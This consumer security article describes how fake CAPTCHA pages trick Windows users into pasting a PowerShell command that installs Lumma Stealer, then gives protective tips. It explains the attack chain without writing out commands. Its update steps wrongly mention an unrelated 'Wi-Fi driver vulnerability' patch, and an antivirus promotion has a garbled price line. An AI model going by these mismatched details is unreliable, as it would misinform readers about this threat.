Hackers are persistently honing their tactics to target Windows users, utilizing both existing vulnerabilities and the installation of malware. A recent discovery by security experts has unveiled a new strain of malware that propagates through deceptive human verification pages. These phishing websites, often hosted on various platforms and leveraging Content Delivery Networks (CDNs), are designed to mislead users by presenting a counterfeit Google CAPTCHA interface. This façade facilitates the covert installation of malware known as Lumma Stealer.
What you need to know
Researchers from Cloudsek have shed light on this innovative method employed by hackers to disseminate Lumma Stealer. Initially reported by Palo Alto Networks’ Unit 42, these fraudulent pages serve as a vehicle for malware distribution. Paul Michaud II, a threat hunter at Unit 42, elaborated on the mechanics of this scheme: “These pages have a button that, when clicked, shows instructions for victims to paste a PowerShell script into a Run window. This copy/paste PowerShell script retrieves and runs a Windows EXE for Lumma Stealer malware.”
Cloudsek’s latest investigation has identified a growing number of malicious sites engaged in the spread of Lumma Stealer. The process is deceptively simple: when users click the “I’m not a robot” button on these counterfeit verification pages, a PowerShell script is copied to their clipboard. If this command is then pasted into the Run dialog box, it activates PowerShell in a concealed window, executing a Base64-encoded command.
This command fetches further instructions from a remote server, leading to the download of Lumma Stealer malware. The downloaded file, labeled “dengo.zip,” must be unzipped and executed on a Windows machine for Lumma Stealer to become operational, establishing connections to domains controlled by the attackers. Notably, the malware delivered via this method can be easily replaced with other malicious files, showcasing the adaptability of these cybercriminals.
Updating your PC is the best course of action
To safeguard against known vulnerabilities, it is crucial to keep your Windows system, browsers, and antivirus software consistently updated. Software updates frequently include patches addressing security weaknesses that hackers exploit. By maintaining current versions of your operating system, browsers, and applications, you effectively close potential entry points for malware.
To update your Windows software and ensure you benefit from the latest security enhancements, follow these straightforward steps:
For Windows 10 and Windows 11
- Click on the Start menu and select “Settings” (or press the Windows key + I shortcut).
- In the Settings window, click on “Update & Security.”
- Under the “Windows Update” section, click on “Check for updates.”
- If updates are available, including the patch for the Wi-Fi driver vulnerability, Windows will download and install them automatically.
- Once the installation is complete, you may be prompted to restart your computer to apply the updates.
For Windows 8.1 and Earlier Versions
- Open the Control Panel and navigate to “System and Security.”
- Under the “Windows Update” section, click on “Check for updates.”
- If updates are available, including the patch for the Wi-Fi driver vulnerability, select them and click “Install updates.”
- Follow the on-screen instructions to complete the installation process.
- Restart your computer if prompted to apply the updates.
5 more ways to protect yourself from Lumma malware
1) Use strong antivirus software: A robust antivirus solution can help detect and thwart threats like Lumma Stealer before they inflict damage. Exercise caution by avoiding clicks on suspicious or unfamiliar links, particularly those from emails or websites requesting human verification. My top recommendation is TotalAV, which is currently offering a limited-time deal for CyberGuy readers: for your first year (80% off) for the TotalAV Antivirus Pro package.
2) Check CAPTCHA pages: Authentic Google CAPTCHA pages will never prompt you to download files or paste commands. If anything seems amiss, it’s best to exit the page.
3) Avoid running unexpected commands: Refrain from pasting or executing commands (such as PowerShell scripts) that you do not fully understand or that were copied from dubious websites. Cybercriminals often deceive users into unwittingly executing malware this way.
4) Keep your software updated: Regularly updating your operating system, browsers, and all software applications is essential. Updates frequently contain patches for security vulnerabilities that malware can exploit.
5) Use two-factor authentication (2FA): Activate 2FA on all your accounts. This additional layer of security requires a second form of verification, making it more challenging for attackers to gain access even if they possess your password.
